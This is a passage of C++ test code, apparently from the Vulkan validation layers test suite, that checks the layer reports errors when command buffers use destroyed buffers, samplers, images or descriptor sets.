descriptor_write.descriptorCount = 3; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = buffer_info; // Update descriptor vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO that uses the uniform buffers char const *fsSource = "#version 450\n" "\n" "layout(location=0) out vec4 x;\n" "layout(set=0) layout(binding=0) uniform foo { int x; int y; } bar;\n" "layout(set=0) layout(binding=1) uniform blah { int x; } duh;\n" "void main(){\n" " x = vec4(duh.x, bar.y, bar.x, 1);\n" "}\n"; VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); pipe.InitInfo(); pipe.shader_stages_ = {pipe.vs_->GetStageCreateInfo(), fs.GetStageCreateInfo()}; const VkDynamicState dyn_states[] = {VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR}; VkPipelineDynamicStateCreateInfo dyn_state_ci = {}; dyn_state_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_DYNAMIC_STATE_CREATE_INFO; dyn_state_ci.dynamicStateCount = 
size(dyn_states);
        dyn_state_ci.pDynamicStates = dyn_states;
        pipe.dyn_state_ci_ = dyn_state_ci;
        pipe.InitState();
        pipe.pipeline_layout_ = VkPipelineLayoutObj(m_device, {&descriptor_set.layout_});
        pipe.CreateGraphicsPipeline();

        m_commandBuffer->begin();
        m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo);
        vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_);
        vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_layout_.handle(), 0, 1,
                                  &descriptor_set.set_, 0, nullptr);

        VkViewport viewport = {0, 0, 16, 16, 0, 1};
        vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport);
        VkRect2D scissor = {{0, 0}, {16, 16}};
        vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor);
        vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0);
        vk::CmdEndRenderPass(m_commandBuffer->handle());
        m_commandBuffer->end();
    }
    // buffer1 just went out of scope and was destroyed along with its memory
    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkBuffer");
    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT,
                                         "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDeviceMemory");

    VkSubmitInfo submit_info = {};
    submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO;
    submit_info.commandBufferCount = 1;
    submit_info.pCommandBuffers = &m_commandBuffer->handle();
    vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE);
    m_errorMonitor->VerifyFound();
}

TEST_F(VkLayerTest, InvalidCmdBufferDescriptorSetBufferDestroyed) {
    TEST_DESCRIPTION(
        "Attempt to draw with a command buffer that is invalid due to a bound descriptor set with a buffer dependency being "
        "destroyed.");
    ASSERT_NO_FATAL_FAILURE(Init());
    ASSERT_NO_FATAL_FAILURE(InitViewport());
    ASSERT_NO_FATAL_FAILURE(InitRenderTarget());

    CreatePipelineHelper pipe(*this);
    {
        // Create a buffer to update the descriptor with
        uint32_t qfi = 0;
        VkBufferCreateInfo buffCI = {};
        buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO;
        buffCI.size = 1024;
        buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT;
        buffCI.queueFamilyIndexCount = 1;
        buffCI.pQueueFamilyIndices = &qfi;

        VkBufferObj buffer;
        buffer.init(*m_device, buffCI);

        // Create PSO to be used for draw-time errors below
        char const *fsSource =
            "#version 450\n"
            "\n"
            "layout(location=0) out vec4 x;\n"
            "layout(set=0) layout(binding=0) uniform foo { int x; int y; } bar;\n"
            "void main(){\n"
            " x = vec4(bar.y);\n"
            "}\n";
        VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this);
        pipe.InitInfo();
        pipe.shader_stages_ = {pipe.vs_->GetStageCreateInfo(), fs.GetStageCreateInfo()};
        const VkDynamicState dyn_states[] = {VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR};
        VkPipelineDynamicStateCreateInfo dyn_state_ci = {};
        dyn_state_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_DYNAMIC_STATE_CREATE_INFO;
        dyn_state_ci.dynamicStateCount = size(dyn_states);
        dyn_state_ci.pDynamicStates = dyn_states;
        pipe.dyn_state_ci_ = dyn_state_ci;
        pipe.InitState();
        pipe.CreateGraphicsPipeline();

        // Correctly update descriptor to avoid "NOT_UPDATED" error
        pipe.descriptor_set_->WriteDescriptorBufferInfo(0, buffer.handle(), 1024);
        pipe.descriptor_set_->UpdateDescriptorSets();

        m_commandBuffer->begin();
        m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo);
        vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_);
        vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_layout_.handle(), 0, 1,
&pipe.descriptor_set_->set_, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &m_viewports[0]); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &m_scissors[0]); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } // Destroy buffer should invalidate the cmd buffer, causing error on submit // Attempt to submit cmd buffer VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // Invalid VkBuffe m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffe"); // Invalid VkDeviceMemory m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " that is invalid because bound "); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidCmdBufferDescriptorSetImageSamplerDestroyed) { TEST_DESCRIPTION( "Attempt to draw with a command buffer that is invalid due to a bound descriptor sets with a combined image sampler having " "their image, sampler, and descriptor set each respectively destroyed and then attempting to submit associated cmd " "buffers. Attempt to destroy a DescriptorSet that is in use."); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = VK_DESCRIPTOR_POOL_CREATE_FREE_DESCRIPTOR_SET_BIT; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; VkResult err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout(m_device, {dsl_binding}); VkDescriptorSet descriptorSet; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 1; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = &ds_layout.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptorSet); ASSERT_VK_SUCCESS(err); const VkPipelineLayoutObj pipeline_layout(m_device, {&ds_layout}); // Create images to update the descriptor with VkImage image; VkImage image2; const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; const int32_t tex_width = 32; const int32_t tex_height = 32; VkImageCreateInfo image_create_info = {}; image_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO; image_create_info.pNext = NULL; image_create_info.imageType = VK_IMAGE_TYPE_2D; image_create_info.format = tex_format; image_create_info.extent.width = tex_width; image_create_info.extent.height = tex_height; image_create_info.extent.depth = 1; image_create_info.mipLevels = 1; image_create_info.arrayLayers = 1; image_create_info.samples = VK_SAMPLE_COUNT_1_BIT; image_create_info.tiling = 
VK_IMAGE_TILING_OPTIMAL; image_create_info.usage = VK_IMAGE_USAGE_SAMPLED_BIT; image_create_info.flags = 0; err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image); ASSERT_VK_SUCCESS(err); err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image2); ASSERT_VK_SUCCESS(err); VkMemoryRequirements memory_reqs; VkDeviceMemory image_memory; bool pass; VkMemoryAllocateInfo memory_info = {}; memory_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; memory_info.pNext = NULL; memory_info.allocationSize = 0; memory_info.memoryTypeIndex = 0; vk::GetImageMemoryRequirements(m_device->device(), image, &memory_reqs); // Allocate enough memory for both images VkDeviceSize align_mod = memory_reqs.size % memory_reqs.alignment; VkDeviceSize aligned_size = ((align_mod == 0) ? memory_reqs.size : (memory_reqs.size + memory_reqs.alignment - align_mod)); memory_info.allocationSize = aligned_size * 2; pass = m_device->phy().set_memory_type(memory_reqs.memoryTypeBits, &memory_info, 0); ASSERT_TRUE(pass); err = vk::AllocateMemory(m_device->device(), &memory_info, NULL, &image_memory); ASSERT_VK_SUCCESS(err); err = vk::BindImageMemory(m_device->device(), image, image_memory, 0); ASSERT_VK_SUCCESS(err); // Bind second image to memory right after first image err = vk::BindImageMemory(m_device->device(), image2, image_memory, aligned_size); ASSERT_VK_SUCCESS(err); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image; image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView tmp_view; // First test deletes this view VkImageView view; VkImageView view2; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &tmp_view); ASSERT_VK_SUCCESS(err); err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); image_view_create_info.image = image2; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view2); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkSampler sampler2; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler2); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler; img_info.imageView = tmp_view; img_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO to be used for draw-time errors below char const *fsSource = "#version 450\n" "\n" "layout(set=0, binding=0) uniform sampler2D s;\n" "layout(location=0) out vec4 x;\n" "void 
main(){\n" " x = texture(s, vec2(1));\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); // First error case is destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); // Transit image layout from VK_IMAGE_LAYOUT_UNDEFINED into VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL VkImageMemoryBarrier barrier = {}; barrier.sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER; barrier.oldLayout = VK_IMAGE_LAYOUT_UNDEFINED; barrier.newLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; barrier.srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; barrier.dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; barrier.image = image; barrier.srcAccessMask = 0; barrier.dstAccessMask = VK_ACCESS_SHADER_READ_BIT; barrier.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; barrier.subresourceRange.baseMipLevel = 0; barrier.subresourceRange.levelCount = 1; barrier.subresourceRange.baseArrayLayer = 0; barrier.subresourceRange.layerCount = 1; vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // This first submit should be successful vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); // Now destroy imageview and reset cmdBuffer vk::DestroyImageView(m_device->device(), tmp_view, NULL); m_commandBuffer->reset(0); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " that is invalid or has been destroyed."); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Re-update descriptor with new view img_info.imageView = view; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Now test destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); 
vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Destroy sampler invalidates the cmd buffer, causing error on submit vk::DestroySampler(m_device->device(), sampler, NULL); // Attempt to submit cmd buffer m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkSampler"); submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Now re-update descriptor with valid sampler and delete image img_info.sampler = sampler2; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); VkCommandBufferBeginInfo info = {}; info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; info.flags = VK_COMMAND_BUFFER_USAGE_SIMULTANEOUS_USE_BIT; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkImage"); m_commandBuffer->begin(&info); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Destroy image invalidates the cmd buffer, causing error on submit vk::DestroyImage(m_device->device(), image, NULL); // Attempt to submit cmd buffer submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Now update descriptor to be valid, but then free descriptor img_info.imageView = view2; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_commandBuffer->begin(&info); // Transit image2 layout from VK_IMAGE_LAYOUT_UNDEFINED into VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL barrier.image = image2; vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); // Immediately try to destroy the descriptor set in the active command buffer - failure expected 
m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-pDescriptorSets-00309"); vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); m_errorMonitor->VerifyFound(); // Try again once the queue is idle - should succeed w/o error // TODO - though the particular error above doesn't re-occur, there are other 'unexpecteds' still to clean up vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->SetUnexpectedError( "pDescriptorSets must be a valid pointer to an array of descriptorSetCount VkDescriptorSet handles, each element of which " "must either be a valid handle or VK_NULL_HANDLE"); m_errorMonitor->SetUnexpectedError("Unable to remove DescriptorSet obj"); vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); // Attempt to submit cmd buffer containing the freed descriptor set submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDescriptorSet"); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Cleanup vk::FreeMemory(m_device->device(), image_memory, NULL); vk::DestroySampler(m_device->device(), sampler2, NULL); vk::DestroyImage(m_device->device(), image2, NULL); vk::DestroyImageView(m_device->device(), view, NULL); vk::DestroyImageView(m_device->device(), view2, NULL); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, InvalidDescriptorSetSamplerDestroyed) { TEST_DESCRIPTION("Attempt to draw with a bound descriptor sets with a combined image sampler where sampler has been deleted."); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create images to update the descriptor with VkImageObj image(m_device); const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; image.Init(32, 32, 1, tex_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image.handle(); image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView view; VkResult err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); VkSampler sampler1; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler1); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler 
VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler; img_info.imageView = view; img_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; VkDescriptorImageInfo img_info1 = img_info; img_info1.sampler = sampler1; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; std::array<VkWriteDescriptorSet, 2> descriptor_writes = {descriptor_write, descriptor_write}; descriptor_writes[1].dstBinding = 1; descriptor_writes[1].pImageInfo = &img_info1; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes.data(), 0, NULL); // Destroy the sampler before it's bound to the cmd buffer vk::DestroySampler(m_device->device(), sampler1, NULL); // Create PSO to be used for draw-time errors below char const *fsSource = "#version 450\n" "\n" "layout(set=0, binding=0) uniform sampler2D s;\n" "layout(set=0, binding=1) uniform sampler2D s1;\n" "layout(location=0) out vec4 x;\n" "void main(){\n" " x = texture(s, vec2(1));\n" " x = texture(s1, vec2(1));\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); // First error case is destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, NULL); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " Descriptor in binding #1 index 0 is using sampler "); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroyImageView(m_device->device(), view, NULL); } TEST_F(VkLayerTest, ImageDescriptorLayoutMismatch) { TEST_DESCRIPTION("Create an image sampler layout->image layout mismatch within/without a command buffer"); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool maint2_support = DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME); if (maint2_support) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); } else { printf("%s Relaxed layout matching subtest requires API >= 1.1 or KHR_MAINTENANCE2 extension, unavailable - skipped.\n", kSkipPrefix); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkDescriptorSet descriptorSet = 
descriptor_set.set_; const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create image, view, and sampler const VkFormat format = VK_FORMAT_B8G8R8A8_UNORM; VkImageObj image(m_device); image.Init(32, 32, 1, format, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); vk_testing::ImageView view; auto image_view_create_info = SafeSaneImageViewCreateInfo(image, format, VK_IMAGE_ASPECT_COLOR_BIT); view.init(*m_device, image_view_create_info); ASSERT_TRUE(view.initialized()); // Create Sampler vk_testing::Sampler sampler; VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); sampler.init(*m_device, sampler_ci); ASSERT_TRUE(sampler.initialized()); // Setup structure for descriptor update with sampler, for update in do_test below VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler.handle(); VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, 